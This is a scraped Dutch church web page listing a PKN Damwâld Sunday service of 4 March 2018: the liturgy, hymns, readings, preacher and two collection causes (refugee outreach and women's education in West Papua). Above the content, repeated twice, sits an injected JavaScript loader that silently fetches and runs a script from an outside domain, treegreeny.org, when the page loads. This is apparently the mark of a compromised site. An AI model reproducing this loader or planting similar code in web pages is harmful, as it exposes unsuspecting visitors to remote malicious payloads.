;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Kerkdienst zondag 4 maart 2018 9:30 uur - PKN Damwâld
zondag 4 maart 2018
09:30 uur
Koffie na de dienst

Kerkdienst zondag 4 maart 2018 9:30 uur

Thema: Gehoorzamen, altijd en overal?

Informatie

Voorganger:Ds. G. Oberink, Urk
Organist:Jaap van der Horn
Thema:Gehoorzamen, altijd en overal?
Mededeling:Koffie na de dienst
Liturgie
Lied voor de dienst Elb 374
Welkom en mededelingen
Intochtslied ELb 246
Stil gebed - Votum - Groet
aanvangstekst Gods Eis Micha 6 : 8
Antwoord Psalm 62 : 4
Gods Wet Leviticus 19
We zingen: Psalm 62 : 7
Gebed
We zingen: Psalm 25 : 7
We lezen: Johannes 2 : 13-22
We zingen: Gezang 173 : 1
Preek : Gehoorzamen, altijd en overal?
We zingen: Gezang 173 : 2-5
Gebeden
Collecte
Slotlied ELb 119
Zegen
Liturgie met de liedteksten is alleen beschikbaar met een Mijn Kerk account. Inloggen
Locatie: Bonifatiuskerk Foarwei 2, Damwâld
Dienst terugluisteren Dienst terugluisteren
Collecte informatie
Eerste collecte: Contact met vluchtelingen in de buurt

Nederland - Contact met vluchtelingen in de buurt (Project 10 27)
Begeleiding, training en materialen voor kerken en Christenen in Nederland om contact aan te gaan met vluchtelingen met een verblijfstatus, die een reguliere woning hebben gekregen. (Een project van Stichting Gave)

Tweede collecte: Kerk
Uitganscollecte: Sterke vrouwen opleiden op Papoea

40-Dagentijd: Collecte Voorjaarszending - Sterke vrouwen opleiden op Papoea
Overal in West-Papoea zijn vrouwen actief betrokken bij de ontwikkeling van hun land en volk. Dat is hard nodig en zeker niet vanzelfsprekend in een maatschappij waar vrouwen traditioneel voorbestemd zijn tot een leven binnenshuis. Velen van hen zijn nauwelijks opgeleid. Het vormingscentrum P3W brengt daar verandering in. Vrouwen leren lezen en schrijven, volgen bijbelstudies, krijgen praktijklessen over gezonde voeding of volgen een vakopleiding. Door de cursussen staan vrouwen sterker in hun schoenen. Bovendien nemen ze hun kennis en ervaring mee terug naar hun dorpen. Vaak richten ze daar een vrouwenvereniging op of starten ze lokale cursussen in hun kerk. Zo spelen steeds meer vrouwen een actieve rol in hun lokale gemeenschap, en bouwen zo mee aan kerk en samenleving. En heel belangrijk: zij stimuleren ook hun dochters om naar school te gaan, zodat het werk in volgende generaties doorgaat.